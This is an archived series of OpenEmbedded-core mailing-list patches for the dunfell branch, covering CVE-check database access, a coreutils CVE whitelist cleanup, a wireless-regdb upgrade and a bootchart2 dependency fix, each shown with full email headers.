 <c50688e1d0839d71e05a0d15dd948113d2ef83f6.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:06 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162728

From: Ross Burton <ross@burtonini.com>

Three CVEs were meant to be ignored via CVE_WHITELIST, but that wasn't
the correct variable name.

The CPEs for those CVEs mean that they don't get picked up in our report,
so just remove the assignment.

Signed-off-by: Ross Burton <ross.burton@arm.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit dea00faf30ec7c19b6b5ed4651b430ba3faf69ff)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/recipes-core/coreutils/coreutils_8.31.bb | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/meta/recipes-core/coreutils/coreutils_8.31.bb b/meta/recipes-core/coreutils/coreutils_8.31.bb
index aabeee882c..3d569881e8 100644
--- a/meta/recipes-core/coreutils/coreutils_8.31.bb
+++ b/meta/recipes-core/coreutils/coreutils_8.31.bb
@@ -206,6 +206,3 @@ do_install_ptest () {
 }
 
 FILES_${PN}-ptest += "${bindir}/getlimits"
-
-# These are specific to Opensuse
-CVE_WHITELIST += "CVE-2013-0221 CVE-2013-0222 CVE-2013-0223"

From patchwork Fri Mar  4 15:04:18 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4681
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 00E17C433FE
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:09 +0000 (UTC)
Received: from mail-pj1-f53.google.com (mail-pj1-f53.google.com
 [209.85.216.53])
 by mx.groups.io with SMTP id smtpd.web11.7948.1646406307907430002
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:08 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=1HQvn2G0;
 spf=softfail (domain: sakoman.com, ip: 209.85.216.53,
 mailfrom: steve@sakoman.com)
Received: by mail-pj1-f53.google.com with SMTP id
 15-20020a17090a098f00b001bef0376d5cso8182255pjo.5
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:07 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=PNUZEL9agC/uBqUv2VRJglmBRVknyT2PSym8g5TwpRQ=;
        b=1HQvn2G0n7gP//OmXJ0mlB2UAeGx/rFkzzJmvvLBLAP89m96s8MpkWnfpHnOdpaouW
         8MKMHbRSq69RK4+eDfK8JFsloNy9Nl7sEb3Gh56MVwBrP/zK2IMSmWnqLu8QBO9PgwKP
         AOb7FVzG7aJNKqt0Bf4cLh+rrFrqf5Qpjlk5VKuyngJrYeahY6JvBbcgNweV3XxL2hmV
         a0kGxwF9kwf8zNaheLZVO/oInX60SbY7WjSwjsYJPMt7zoh+TslM4UR0QxW+fwaeBOWh
         akJIG13cw+Z0eNLjsZlacV/FFvHf5UWNUxWREU9mYgTsI0n8k7iJDQltZ0mNPJ1jUJcY
         SyHQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=PNUZEL9agC/uBqUv2VRJglmBRVknyT2PSym8g5TwpRQ=;
        b=qQ9MkhmzcQvfmTrZ7m+ni3kUMhGwCS1f6rfJVZD3D9GB52msSuSxEfWI3Dv82DhrD0
         vT1xlQVx/nBDLCjOwkusCOUK1WPooSDiq6pS1XWijg87ma3pipaOOrsM7UYnJgs/kzYs
         NVQOdK4xt8/t18i8yeldfSL+nns4ybNkovzD/CAUGWYt3c7mT2tL23U4vNl/AaDFOAzo
         eampAie6qvSGQMCenMra7yjsWi7C5PRbB+PhiI48+17OS1xM0TmXQLKueVgtVbcUM1kz
         OcSTkNtyK7M7RmkJdJB9C27Jbi5bZvPAmOhnCSR9Ylm7MjPDcPJJks6MV3hVeIqXd6kB
         phyw==
X-Gm-Message-State: AOAM531UQYtCjqUVzSA6nSX1AqdFfxG+O5SzB9r9d8foI7oftfXdzupD
	0usZioKdj0u7jq7G7c+4/6DesFIJRGSIe0oTgPs=
X-Google-Smtp-Source: 
 ABdhPJzzhMPe0wSVc5pS07F3U0zUZuYbkfIv+nTtTYV25/s1sZZAS2GmkG2vw1J/4mZb49EnYme9Vw==
X-Received: by 2002:a17:90b:4c41:b0:1be:f5d3:78eb with SMTP id
 np1-20020a17090b4c4100b001bef5d378ebmr11136225pjb.187.1646406306970;
        Fri, 04 Mar 2022 07:05:06 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.05
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:06 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 10/18] cve-check: get_cve_info should open the
 database read-only
Date: Fri,  4 Mar 2022 05:04:18 -1000
Message-Id: 
 <2b3d13a451e99db669977d4d1172653b736ae6e1.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:08 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162729

From: Ross Burton <ross@burtonini.com>

All of the function in cve-check should open the database read-only, as
the only writer is the fetch task in cve-update-db.  However,
get_cve_info() was failing to do this, which might be causing locking
issues with sqlite.

Signed-off-by: Ross Burton <ross.burton@arm.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 8de517238f1f418d9af1ce312d99de04ce2e26fc)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/classes/cve-check.bbclass | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 6b627464a0..5369b7074c 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -323,7 +323,8 @@ def get_cve_info(d, cves):
     import sqlite3
 
     cve_data = {}
-    conn = sqlite3.connect(d.getVar("CVE_CHECK_DB_FILE"))
+    db_file = d.expand("file:${CVE_CHECK_DB_FILE}?mode=ro")
+    conn = sqlite3.connect(db_file, uri=True)
 
     for cve in cves:
         for row in conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,)):

From patchwork Fri Mar  4 15:04:19 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4684
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 06A60C433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:18 +0000 (UTC)
Received: from mail-pj1-f43.google.com (mail-pj1-f43.google.com
 [209.85.216.43])
 by mx.groups.io with SMTP id smtpd.web12.7915.1646406310097232995
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:10 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=wQvd7/uc;
 spf=softfail (domain: sakoman.com, ip: 209.85.216.43,
 mailfrom: steve@sakoman.com)
Received: by mail-pj1-f43.google.com with SMTP id
 15-20020a17090a098f00b001bef0376d5cso8182371pjo.5
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:10 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=HpWW+fO3ujAkPkbxBeH39dkcrn2i5p8JIQ0vlxvXazE=;
        b=wQvd7/ucjABHwYoCjOFAhHMCKxzptWYWYlVMXKV27q3O/YGqIKjwnQp7+Sx7vVj9dz
         no1cH2sKmm+Mb7Tp+q4A2W2+QUr3Ztq0F6yEJIKAfQRCwHWwHVnq1kSugXjJKWUeQQVM
         cFHvWyxdZmB0gPDhTyViHpxohQuvZGmKy+Kja9i34vJ3GKweMm8M9igBqvk6+lmrXth8
         cAAE/RdZuKtTsIHsxGDfwLmN0OeUlyBlAkX6fpdJce06/MNCxJfLOePyHnmUao9ubW1Z
         m01Tgvi/eYkqQVSLg0th0zhR1BQu5o+FHZlTMkqsehnUtUmNLLgeqwxPmCqYt8AQ0+MP
         VtSg==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=HpWW+fO3ujAkPkbxBeH39dkcrn2i5p8JIQ0vlxvXazE=;
        b=eAtmHjxaM7E0x+CiR4kUbaLT/08EOQshZ2W4gKZeWcRZtShWkctOvQGfyej4JvNvq/
         NcvMQxqbY97b/9IgsJsg6ta22lDF3DBRolI5/3Dg8KRa/jkvniFL8hX96SxQAeU0k2CS
         5jFOqxlUhC1mAYUdW6/L6JTSc+qbTlElhv9SqvH4lkmLF5kBW1aIlIG5kRLlTUMbeEHd
         Hj1BcJ9668Z3xRAeFI+W9apigtPCtRa1FBLPtx7MjL72H2l9LhhUE90YGEH0Qn+Rbrm/
         HSTBgy23Ev5KNRczL77UaHgjXe/bW/4mrov4Jwc9dT75RJpFzANfOLFtuW2B89xyrZro
         0EOQ==
X-Gm-Message-State: AOAM5305Gio6G2H6LtR+nwZ8Ep1yN/aovmBrfyN3ztvGe7dEsGIKu+Gb
	Q6V4DAKqUzSnIxKedTiYOwHDs08mrqfpaHPvdsM=
X-Google-Smtp-Source: 
 ABdhPJzZaTwXqPJjoKidYimYvNHGoGNJJweyiYGLCRytBhP26Pv3hl4tPkm7Nr2k5wop6ldUQgf03Q==
X-Received: by 2002:a17:90a:d0c4:b0:1bc:b02e:ed75 with SMTP id
 y4-20020a17090ad0c400b001bcb02eed75mr11099632pjw.104.1646406309134;
        Fri, 04 Mar 2022 07:05:09 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.07
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:08 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 11/18] Revert "cve-check: add lockfile to task"
Date: Fri,  4 Mar 2022 05:04:19 -1000
Message-Id: 
 <1a30a8513ca47890470ee9d19a5ea36437e664bf.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:18 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162730

From: Ross Burton <ross@burtonini.com>

Now that all of the functions in cve-check open the database read-only,
we can remove this lockfile.

This means cve-check can run in parallal again, improving runtimes
massively.

This reverts commit d55fbf4779483d2cfd71df78d0f733b599fef739.

Signed-off-by: Ross Burton <ross.burton@arm.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit e60d149b41d14d177df20dbecaef943696df1586)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/classes/cve-check.bbclass | 1 -
 1 file changed, 1 deletion(-)

diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 5369b7074c..75c5b92b96 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -110,7 +110,6 @@ python do_cve_check () {
 }
 
 addtask cve_check before do_build after do_fetch
-do_cve_check[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
 do_cve_check[depends] = "cve-update-db-native:do_fetch"
 do_cve_check[nostamp] = "1"
 

From patchwork Fri Mar  4 15:04:20 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4682
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 08993C433FE
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:13 +0000 (UTC)
Received: from mail-pg1-f178.google.com (mail-pg1-f178.google.com
 [209.85.215.178])
 by mx.groups.io with SMTP id smtpd.web09.7901.1646406312389493673
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:12 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=EpiPlwnO;
 spf=softfail (domain: sakoman.com, ip: 209.85.215.178,
 mailfrom: steve@sakoman.com)
Received: by mail-pg1-f178.google.com with SMTP id 132so7744293pga.5
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:12 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=E6ql8Whrdk7tSC0j1258ySUOMt+aBDGEBVOc/xaOxN4=;
        b=EpiPlwnOI+hLH0uydDU2dgKe3g5hWXwQqNflNcABiMeXRvZ5OKzYFCjHuzK1TEckOI
         3v2+pjmaYh0j36mVSFWcnEV4s1zyb1mpxK0CwWWLL5e+/PgjSvj9VlQMyOU7f9lM8Mz/
         xUVWuFmrfpuYJ/ddgRCRWbGVFb3bidLIMrPUrGvsyd3kynAPcNmqUjieOeU+D/ZjguT9
         kmnYvvXLxL4dB2oVIbNfzLRYXMNAKho8dJ48bxyQ0/+QmsCXyUBrEYEC/r4MfFJbYvNr
         gsWd/XePPrkdmw9ci2de1f8108h/Y0X1+6oQ7Eq1g8UswAdCg0DAAvq5a0PL2cdPpDRT
         lR1A==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=E6ql8Whrdk7tSC0j1258ySUOMt+aBDGEBVOc/xaOxN4=;
        b=3AFqMgEvbK9VL1Dw8796vW2zklzu33GWfLhMH92j6VlEUiTEwMU4kQf9J+PQacyQkh
         89NbLcFyh24krmGgfVmLroatOYaq8UyPIGJjsU1dmnDwKGBskwPaXLhH+GbMxuz+NtJW
         5kZ8b+cDAxnVfAS1IZ6wmtSL7kD8gOoYEpiwzylsdqB2y2289NjZ++ta6MBeXRrPE9jO
         QRJdfON6Sb3f09AQhfnk3tObZXsU1KS0eloAeiBbICfj0XRtzrURXCmEEIH+BTUovBoo
         Kp8VNG1Mdf2f/5Jq1ZoNCu9obUx/27dDSmqPCmhPF9UlfKbNBuPQCj/foT4kmlPEX7Q+
         FpKg==
X-Gm-Message-State: AOAM531kmPRDbrcJWIiLHTRrhKdEgbgqw4IvWXy0P7PcgHMDQWGHRoue
	F51Zlbds5lxgr7DFT6zzVQ3Wa0SPG/b7kjp6oLE=
X-Google-Smtp-Source: 
 ABdhPJzzQAJ3+FBjx40bErQ0HYFJ+O1/F6JhXFLJtQVq5l0xcXS+c7MIqIK3bGU+zc7xvo/fZrhaOg==
X-Received: by 2002:a63:c56:0:b0:378:7ad0:c01c with SMTP id
 22-20020a630c56000000b003787ad0c01cmr25170455pgm.510.1646406311379;
        Fri, 04 Mar 2022 07:05:11 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.10
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:10 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 12/18] wireless-regdb: upgrade 2021.08.28 ->
 2022.02.18
Date: Fri,  4 Mar 2022 05:04:20 -1000
Message-Id: 
 <fd64364f16c822960a00e8a28b87b0ec590eed74.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:13 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162731

From: wangmy <wangmy@fujitsu.com>

Signed-off-by: Wang Mingyu <wangmy@fujitsu.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit e5c06ddfd3c0db0d0762c0241c019f59ad310e53)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 ...ireless-regdb_2021.08.28.bb => wireless-regdb_2022.02.18.bb} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename meta/recipes-kernel/wireless-regdb/{wireless-regdb_2021.08.28.bb => wireless-regdb_2022.02.18.bb} (94%)

diff --git a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2022.02.18.bb
similarity index 94%
rename from meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb
rename to meta/recipes-kernel/wireless-regdb/wireless-regdb_2022.02.18.bb
index 376311804e..4e6da4cbe1 100644
--- a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb
+++ b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2022.02.18.bb
@@ -5,7 +5,7 @@ LICENSE = "ISC"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c"
 
 SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz"
-SRC_URI[sha256sum] = "cff370c410d1e6d316ae0a7fa8ac6278fdf1efca5d3d664aca7cfd2aafa54446"
+SRC_URI[sha256sum] = "8828c25a4ee25020044004f57374bb9deac852809fad70f8d3d01770bf9ac97f"
 
 inherit bin_package allarch
 

From patchwork Fri Mar  4 15:04:21 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4683
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 01EBBC433EF
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:16 +0000 (UTC)
Received: from mail-pf1-f173.google.com (mail-pf1-f173.google.com
 [209.85.210.173])
 by mx.groups.io with SMTP id smtpd.web12.7917.1646406314835474765
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:14 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=D95AyJo7;
 spf=softfail (domain: sakoman.com, ip: 209.85.210.173,
 mailfrom: steve@sakoman.com)
Received: by mail-pf1-f173.google.com with SMTP id y11so7835683pfa.6
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:14 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=p78FtNU4yHR1mim/IzkfRrmKpEBmyufk8Haum7wrtYk=;
        b=D95AyJo77PprPegkPW4EOz3uP85pW394zh+XwZIQTVhGg9YNXd16rysOZfrB81XW9W
         vOW7PXWS9IkpeFjsbyhoyB1XOUBORhOdnE8/wNXVBerfcwoogmjxJ74ZxSVt4XRhTIud
         ELL3vqOaB2Awe7SbnxKjtfjbjKtg54ADwzN3thCkVnIotrZ26t6jQJe3Oyvq3umEBvzy
         Kacx7eOxJ7re1fJrJjXhF2Xo8j/p0oCaw8yl9pn0Ucxg+Clfzr1BB01MiqdZm0KU4jA0
         0nMFPObaZDw9tRnjm4iQHwWmb2j43Pi8vXXxoFRAjgibgbyHoZR9Z/yNlBi7iVOWQ8Bi
         znmQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=p78FtNU4yHR1mim/IzkfRrmKpEBmyufk8Haum7wrtYk=;
        b=SBPI/4DdLkcrJ8kvOcyzwadzmijyCHDKZf2UgGIHpmU5XMXBS5RFYV/AhHuBQFc26c
         XpZWMzzrSZMzsv31FqrpBGPN+blKn5rdeGnm1gKvbwF7PQZGs+qTT06iIX5sB6x8Jvjg
         rPvnc08iIZuCz4tFRIqvS9GcNo0DOxAlDlgBqxV86e8/38oFRk6whFElwDrHQlVaHiS0
         QFhjd4oyPkjYVx8x6/ekRbhtEz9bUyg39KaG4NvjGk8GuPq7TFIQKfk5OwKmQVftlq2l
         WbdsfrCukh8KhN3SfGBnAnNRsjgn1seGKOBOSJ7QjY7KoAvrlVg/HeLtShs6i9ecARAw
         D/Ww==
X-Gm-Message-State: AOAM532RsL3Q43IhYJnLH6MuGlJ7x+F3rYWKO0HBOsYjIKOVGJQeBB4s
	SazAWU2IPOUZoNQN6cKSg19tgwviGKEw21ZOuj8=
X-Google-Smtp-Source: 
 ABdhPJyPsp75t8GBX9ib+CX+i2AUP9jK9fmfgqHb3DXd0Dy+UHTK8M7sC0KYgMIPPer9auMcjdi6iQ==
X-Received: by 2002:a63:e554:0:b0:34c:262a:c174 with SMTP id
 z20-20020a63e554000000b0034c262ac174mr34624961pgj.330.1646406313804;
        Fri, 04 Mar 2022 07:05:13 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.12
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:13 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 13/18] bootchart2: Add missing python3-math
 dependency
Date: Fri,  4 Mar 2022 05:04:21 -1000
Message-Id: 
 <123d4a673dadfee14d5ad8bbc503405da9602bb0.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:16 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162732

From: Marek Vasut <marex@denx.de>

Without this dependency, generating the bootchart may fail with:
"
ModuleNotFoundError: No module named 'random'
"

(cherry picked from commit 487e9f16a00f895159b79f1865fe8b626b47ddc2)
Signed-off-by: Marek Vasut <marex@denx.de>
Cc: Mingli Yu <mingli.yu@windriver.com>
Cc: Richard Purdie <richard.purdie@linuxfoundation.org>
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index 66bd897a9a..7f05bd1b0b 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -144,7 +144,7 @@ do_install () {
 
 PACKAGES =+ "pybootchartgui"
 FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui"
-RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-shell python3-compression python3-codecs"
+RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-compression python3-codecs"
 RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}"
 RDEPENDS_${PN}_class-target += "lsb-release"
 DEPENDS_append_class-native = " python3-pycairo-native"

From patchwork Fri Mar  4 15:04:22 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4686
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 07EC6C433FE
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:18 +0000 (UTC)
Received: from mail-pg1-f179.google.com (mail-pg1-f179.google.com
 [209.85.215.179])
 by mx.groups.io with SMTP id smtpd.web11.7950.1646406316729376203
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:16 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=W+37K89U;
 spf=softfail (domain: sakoman.com, ip: 209.85.215.179,
 mailfrom: steve@sakoman.com)
Received: by mail-pg1-f179.google.com with SMTP id bc27so7745264pgb.4
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:16 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=Q/rjlvK/axnWLbDMS0ZHZC2K9h+cBOFreGdP7kdLmo0=;
        b=W+37K89Ul3ZGsLFWxHToa/WiQIwDtCM0IbLo0Qq0KNsgwZPlfVfnb3jECIGw8nTnhK
